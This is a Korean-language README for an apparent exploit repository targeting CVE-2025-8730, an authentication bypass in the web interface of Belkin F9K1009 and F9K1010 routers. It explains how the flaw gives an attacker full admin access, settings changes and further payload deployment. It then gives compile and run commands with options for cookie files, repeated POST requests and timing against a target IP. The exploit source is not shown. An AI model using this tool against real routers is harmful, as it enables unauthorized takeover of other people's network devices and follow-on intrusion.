
Belkin F9K1009 및 F9K1010 라우터의 웹 인터페이스에서 인증 우회 취약점을 보여주는 익스플로잇
작성자 : Byte Reaper
이 저장소에는 Belkin F9K1009 및 F9K1010 라우터의 웹 인터페이스에 영향을 미치는 중요한 인증 우회 취약점인 CVE‑2025‑8730에 대한 익스플로잇이 포함되어 있습니다.
이 결함은 /login.htm 파일의 세션 검증 로직에 있으며, 부적절하게 처리된 쿠키나 조작된 요청을 통해 공격자가 유효한 자격 증명 없이 로그인 확인을 우회하고 관리자 인터페이스에 대한 전체 액세스 권한을 얻을 수 있습니다.
이 취약점은 (네트워크 액세스 권한이 있는) 원격 공격자가 다음을 수행할 수 있게 합니다:
민감한 구성 데이터에 액세스
라우터 설정 수정
지속성 또는 측면 이동을 위한 추가 페이로드 배포
NVD 항목: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
라이선스 :
MIT License